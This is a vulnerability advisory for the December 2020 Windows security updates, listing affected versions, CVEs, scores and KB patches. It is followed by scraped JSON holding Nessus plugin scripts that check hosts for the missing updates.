### *Detect date*:
12/08/2020
### *Severity*:
Critical
### *Description*:
Multiple vulnerabilities were found in Microsoft Windows. Malicious users can exploit these vulnerabilities to gain privileges, obtain sensitive information, bypass security restrictions, and execute arbitrary code.
### *Affected products*:
Windows Server, version 2004 (Server Core installation)
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2012
Windows Server 2012 R2 (Server Core installation)
Windows Server, version 1909 (Server Core installation)
Windows 10 Version 1607 for 32-bit Systems
Windows Server 2016
Windows Server 2019 (Server Core installation)
Windows 10 Version 20H2 for 32-bit Systems
Windows 7 for 32-bit Systems Service Pack 1
Windows 10 Version 20H2 for ARM64-based Systems
Windows 10 Version 2004 for 32-bit Systems
Windows 10 Version 1809 for x64-based Systems
Windows 8.1 for 32-bit systems
Windows 10 for x64-based Systems
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
Windows 10 Version 20H2 for x64-based Systems
Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
Windows 10 Version 1903 for x64-based Systems
Windows 10 Version 1909 for x64-based Systems
Windows 10 Version 1809 for 32-bit Systems
Windows 10 Version 1903 for ARM64-based Systems
Windows 10 Version 1909 for ARM64-based Systems
Windows 10 Version 1809 for ARM64-based Systems
Windows 10 Version 1607 for x64-based Systems
Windows 7 for x64-based Systems Service Pack 1
Windows RT 8.1
Windows 10 Version 1803 for 32-bit Systems
Windows Server 2016 (Server Core installation)
Windows Server 2012 (Server Core installation)
Windows Server 2019
Windows 10 Version 1909 for 32-bit Systems
Windows 8.1 for x64-based systems
Windows 10 Version 2004 for ARM64-based Systems
Windows 10 Version 1903 for 32-bit Systems
Windows 10 for 32-bit Systems
Windows 10 Version 2004 for x64-based Systems
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2012 R2
Windows Server, version 1903 (Server Core installation)
Windows 10 Version 1803 for ARM64-based Systems
Windows 10 Version 1803 for x64-based Systems
Windows Server, version 20H2 (Server Core Installation)
### *Solution*:
Install the necessary updates from the KB list section that are offered in Windows Update (Windows Update can usually be accessed from the Control Panel).
### *Original advisories*:
[CVE-2020-17103](<https://nvd.nist.gov/vuln/detail/CVE-2020-17103>)
[CVE-2020-16964](<https://nvd.nist.gov/vuln/detail/CVE-2020-16964>)
[CVE-2020-16960](<https://nvd.nist.gov/vuln/detail/CVE-2020-16960>)
[CVE-2020-17140](<https://nvd.nist.gov/vuln/detail/CVE-2020-17140>)
[CVE-2020-16962](<https://nvd.nist.gov/vuln/detail/CVE-2020-16962>)
[CVE-2020-16963](<https://nvd.nist.gov/vuln/detail/CVE-2020-16963>)
[CVE-2020-16961](<https://nvd.nist.gov/vuln/detail/CVE-2020-16961>)
[CVE-2020-17099](<https://nvd.nist.gov/vuln/detail/CVE-2020-17099>)
[CVE-2020-17098](<https://nvd.nist.gov/vuln/detail/CVE-2020-17098>)
[CVE-2020-17097](<https://nvd.nist.gov/vuln/detail/CVE-2020-17097>)
[CVE-2020-17096](<https://nvd.nist.gov/vuln/detail/CVE-2020-17096>)
[CVE-2020-17095](<https://nvd.nist.gov/vuln/detail/CVE-2020-17095>)
[CVE-2020-17094](<https://nvd.nist.gov/vuln/detail/CVE-2020-17094>)
[CVE-2020-17092](<https://nvd.nist.gov/vuln/detail/CVE-2020-17092>)
[CVE-2020-17138](<https://nvd.nist.gov/vuln/detail/CVE-2020-17138>)
[CVE-2020-17139](<https://nvd.nist.gov/vuln/detail/CVE-2020-17139>)
[CVE-2020-17134](<https://nvd.nist.gov/vuln/detail/CVE-2020-17134>)
[CVE-2020-17136](<https://nvd.nist.gov/vuln/detail/CVE-2020-17136>)
[CVE-2020-17137](<https://nvd.nist.gov/vuln/detail/CVE-2020-17137>)
[CVE-2020-16996](<https://nvd.nist.gov/vuln/detail/CVE-2020-16996>)
[CVE-2020-16959](<https://nvd.nist.gov/vuln/detail/CVE-2020-16959>)
[CVE-2020-16958](<https://nvd.nist.gov/vuln/detail/CVE-2020-16958>)
[ADV200013](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/ADV200013>)
### *Impacts*:
ACE
### *Related products*:
[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)
### *CVE-IDS*:
[CVE-2020-17103](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17103>) 7.2 High
[CVE-2020-16964](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16964>) 7.2 High
[CVE-2020-16960](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16960>) 7.2 High
[CVE-2020-17140](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17140>) 4.0 Warning
[CVE-2020-16962](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16962>) 7.2 High
[CVE-2020-16963](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16963>) 7.2 High
[CVE-2020-16961](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16961>) 7.2 High
[CVE-2020-17099](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17099>) 4.6 Warning
[CVE-2020-17098](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17098>) 2.1 Warning
[CVE-2020-17097](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17097>) 4.6 Warning
[CVE-2020-17096](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17096>) 9.0 Critical
[CVE-2020-17095](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17095>) 9.0 Critical
[CVE-2020-17094](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17094>) 2.1 Warning
[CVE-2020-17092](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17092>) 7.2 High
[CVE-2020-17138](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17138>) 2.1 Warning
[CVE-2020-17139](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17139>) 4.6 Warning
[CVE-2020-17134](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17134>) 4.6 Warning
[CVE-2020-17136](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17136>) 4.6 Warning
[CVE-2020-17137](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17137>) 4.6 Warning
[CVE-2020-16996](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16996>) 4.0 Warning
[CVE-2020-16959](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16959>) 7.2 High
[CVE-2020-16958](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16958>) 7.2 High
### *KB list*:
[4592449](<http://support.microsoft.com/kb/4592449>)
[4592440](<http://support.microsoft.com/kb/4592440>)
[4592438](<http://support.microsoft.com/kb/4592438>)
[4592484](<http://support.microsoft.com/kb/4592484>)
[4593226](<http://support.microsoft.com/kb/4593226>)
[4592495](<http://support.microsoft.com/kb/4592495>)
[4592497](<http://support.microsoft.com/kb/4592497>)
[4592446](<http://support.microsoft.com/kb/4592446>)
[4592464](<http://support.microsoft.com/kb/4592464>)
[4592468](<http://support.microsoft.com/kb/4592468>)
[5000822](<http://support.microsoft.com/kb/5000822>)
[5000847](<http://support.microsoft.com/kb/5000847>)
[5000808](<http://support.microsoft.com/kb/5000808>)
[5000803](<http://support.microsoft.com/kb/5000803>)
[5000848](<http://support.microsoft.com/kb/5000848>)
[5000802](<http://support.microsoft.com/kb/5000802>)
[5000853](<http://support.microsoft.com/kb/5000853>)
[5000840](<http://support.microsoft.com/kb/5000840>)
### *Microsoft official advisories*:
(CVE-2020-17094, CVE-2020-17098,\n CVE-2020-17140)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2020-16996, CVE-2020-17099, CVE-2020-17139)\");\n # https://support.microsoft.com/en-us/help/4592440/windows-10-update-kb4592440\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1972925b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4592440.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-17096\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-17095\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/12/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS20-12';\nkbs = make_list('4592440');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'17763',\n rollup_date:'12_2020',\n bulletin:bulletin,\n rollup_kb_list:[4592440])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-06-23T15:13:53", "description": "The remote Windows host is missing security update 4592446.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2020-17099)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. 
(CVE-2020-17095, CVE-2020-17096)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2020-16958, CVE-2020-16959, CVE-2020-16960, CVE-2020-16961, CVE-2020-16962, CVE-2020-16963, CVE-2020-16964, CVE-2020-17092, CVE-2020-17097, CVE-2020-17103, CVE-2020-17134, CVE-2020-17136)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2020-17094, CVE-2020-17098, CVE-2020-17140)", "cvss3": {"score": 9.9, "vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"}, "published": "2020-12-08T00:00:00", "type": "nessus", "title": "KB4592446: Windows 10 Version 1803 December 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-16958", "CVE-2020-16959", "CVE-2020-16960", "CVE-2020-16961", "CVE-2020-16962", "CVE-2020-16963", "CVE-2020-16964", "CVE-2020-17092", "CVE-2020-17094", "CVE-2020-17095", "CVE-2020-17096", "CVE-2020-17097", "CVE-2020-17098", "CVE-2020-17099", "CVE-2020-17103", "CVE-2020-17134", "CVE-2020-17136", "CVE-2020-17140"], "modified": "2022-05-11T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_DEC_4592446.NASL", "href": "https://www.tenable.com/plugins/nessus/143571", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(143571);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/11\");\n\n script_cve_id(\n \"CVE-2020-16958\",\n \"CVE-2020-16959\",\n \"CVE-2020-16960\",\n \"CVE-2020-16961\",\n \"CVE-2020-16962\",\n \"CVE-2020-16963\",\n \"CVE-2020-16964\",\n \"CVE-2020-17092\",\n \"CVE-2020-17094\",\n \"CVE-2020-17095\",\n \"CVE-2020-17096\",\n \"CVE-2020-17097\",\n \"CVE-2020-17098\",\n \"CVE-2020-17099\",\n \"CVE-2020-17103\",\n \"CVE-2020-17134\",\n \"CVE-2020-17136\",\n \"CVE-2020-17140\"\n );\n script_xref(name:\"MSKB\", value:\"4592446\");\n script_xref(name:\"MSFT\", value:\"MS20-4592446\");\n script_xref(name:\"IAVA\", value:\"2020-A-0561-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0562-S\");\n\n script_name(english:\"KB4592446: Windows 10 Version 1803 December 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4592446.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2020-17099)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2020-17095,\n CVE-2020-17096)\n\n - An elevation of privilege vulnerability. 
An attacker can\n exploit this to gain elevated privileges.\n (CVE-2020-16958, CVE-2020-16959, CVE-2020-16960,\n CVE-2020-16961, CVE-2020-16962, CVE-2020-16963,\n CVE-2020-16964, CVE-2020-17092, CVE-2020-17097,\n CVE-2020-17103, CVE-2020-17134, CVE-2020-17136)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2020-17094, CVE-2020-17098,\n CVE-2020-17140)\");\n # https://support.microsoft.com/en-us/help/4592446/windows-10-update-kb4592446\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e51f32b6\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4592446.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-17096\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-17095\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/12/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is 
owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS20-12';\nkbs = make_list('4592446');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'17134',\n rollup_date:'12_2020',\n bulletin:bulletin,\n rollup_kb_list:[4592446])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-08-16T15:42:36", "description": "The remote Windows host is missing security update 4593226.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2020-16958, CVE-2020-16959, CVE-2020-16960, CVE-2020-16961, CVE-2020-16962, CVE-2020-16963, CVE-2020-16964, CVE-2020-17092, CVE-2020-17097)\n\n - A remote code execution vulnerability. 
An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2020-17095, CVE-2020-17096)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2020-16996, CVE-2020-17099)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2020-17098, CVE-2020-17138, CVE-2020-17140)", "cvss3": {"score": 8.5, "vector": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H"}, "published": "2020-12-08T00:00:00", "type": "nessus", "title": "KB4593226: Windows 10 Version 1607 and Windows Server 2016 December 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-16958", "CVE-2020-16959", "CVE-2020-16960", "CVE-2020-16961", "CVE-2020-16962", "CVE-2020-16963", "CVE-2020-16964", "CVE-2020-16996", "CVE-2020-17092", "CVE-2020-17095", "CVE-2020-17096", "CVE-2020-17097", "CVE-2020-17098", "CVE-2020-17099", "CVE-2020-17138", "CVE-2020-17140"], "modified": "2021-06-03T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_DEC_4586830.NASL", "href": "https://www.tenable.com/plugins/nessus/143569", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(143569);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/06/03\");\n\n script_cve_id(\n \"CVE-2020-16958\",\n \"CVE-2020-16959\",\n \"CVE-2020-16960\",\n \"CVE-2020-16961\",\n \"CVE-2020-16962\",\n \"CVE-2020-16963\",\n \"CVE-2020-16964\",\n \"CVE-2020-16996\",\n \"CVE-2020-17092\",\n \"CVE-2020-17095\",\n \"CVE-2020-17096\",\n \"CVE-2020-17097\",\n \"CVE-2020-17098\",\n \"CVE-2020-17099\",\n \"CVE-2020-17138\",\n \"CVE-2020-17140\"\n );\n script_xref(name:\"MSKB\", value:\"4593226\");\n script_xref(name:\"MSFT\", value:\"MS20-4593226\");\n script_xref(name:\"IAVA\", value:\"2020-A-0561-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0562-S\");\n\n script_name(english:\"KB4593226: Windows 10 Version 1607 and Windows Server 2016 December 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4593226.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2020-16958, CVE-2020-16959, CVE-2020-16960,\n CVE-2020-16961, CVE-2020-16962, CVE-2020-16963,\n CVE-2020-16964, CVE-2020-17092, CVE-2020-17097)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2020-17095,\n CVE-2020-17096)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2020-16996, CVE-2020-17099)\n\n - An information disclosure vulnerability. 
An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2020-17098, CVE-2020-17138,\n CVE-2020-17140)\");\n # https://support.microsoft.com/en-us/help/4593226/windows-10-update-kb4593226\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?779e1d95\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4586830.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"manual\");\n script_set_attribute(attribute:\"cvss_score_rationale\", value:\"Score based on analysis of the vendor advisory.\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/12/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS20-12';\nkbs = make_list('4593226');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'14393',\n rollup_date:'12_2020',\n bulletin:bulletin,\n rollup_kb_list:[4593226])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 7.1, "vector": "AV:N/AC:H/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-06-23T15:14:29", "description": "The remote Windows host is missing security update 4592449.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2020-16958, CVE-2020-16959, CVE-2020-16960, CVE-2020-16961, CVE-2020-16962, CVE-2020-16963, CVE-2020-16964, CVE-2020-17092, CVE-2020-17097, CVE-2020-17103, CVE-2020-17134, CVE-2020-17136)\n\n - A remote code execution vulnerability. 
An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2020-17095, CVE-2020-17096)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2020-17139)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2020-17094, CVE-2020-17098, CVE-2020-17140)", "cvss3": {"score": 9.9, "vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"}, "published": "2020-12-08T00:00:00", "type": "nessus", "title": "KB4592449: Windows 10 Version 1903 and Windows 10 Version 1909 December 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-16958", "CVE-2020-16959", "CVE-2020-16960", "CVE-2020-16961", "CVE-2020-16962", "CVE-2020-16963", "CVE-2020-16964", "CVE-2020-16996", "CVE-2020-17092", "CVE-2020-17094", "CVE-2020-17095", "CVE-2020-17096", "CVE-2020-17097", "CVE-2020-17098", "CVE-2020-17103", "CVE-2020-17131", "CVE-2020-17134", "CVE-2020-17136", "CVE-2020-17139", "CVE-2020-17140"], "modified": "2022-05-11T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_DEC_4592449.NASL", "href": "https://www.tenable.com/plugins/nessus/143570", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(143570);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/11\");\n\n script_cve_id(\n \"CVE-2020-16958\",\n \"CVE-2020-16959\",\n \"CVE-2020-16960\",\n \"CVE-2020-16961\",\n \"CVE-2020-16962\",\n \"CVE-2020-16963\",\n \"CVE-2020-16964\",\n \"CVE-2020-16996\",\n \"CVE-2020-17092\",\n \"CVE-2020-17094\",\n \"CVE-2020-17095\",\n \"CVE-2020-17096\",\n \"CVE-2020-17097\",\n \"CVE-2020-17098\",\n \"CVE-2020-17103\",\n \"CVE-2020-17131\",\n \"CVE-2020-17134\",\n \"CVE-2020-17136\",\n \"CVE-2020-17139\",\n \"CVE-2020-17140\"\n );\n script_xref(name:\"MSKB\", value:\"4592449\");\n script_xref(name:\"MSFT\", value:\"MS20-4592449\");\n script_xref(name:\"IAVA\", value:\"2020-A-0555\");\n script_xref(name:\"IAVA\", value:\"2020-A-0561-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0562-S\");\n\n script_name(english:\"KB4592449: Windows 10 Version 1903 and Windows 10 Version 1909 December 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4592449.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2020-16958, CVE-2020-16959, CVE-2020-16960,\n CVE-2020-16961, CVE-2020-16962, CVE-2020-16963,\n CVE-2020-16964, CVE-2020-17092, CVE-2020-17097,\n CVE-2020-17103, CVE-2020-17134, CVE-2020-17136)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to 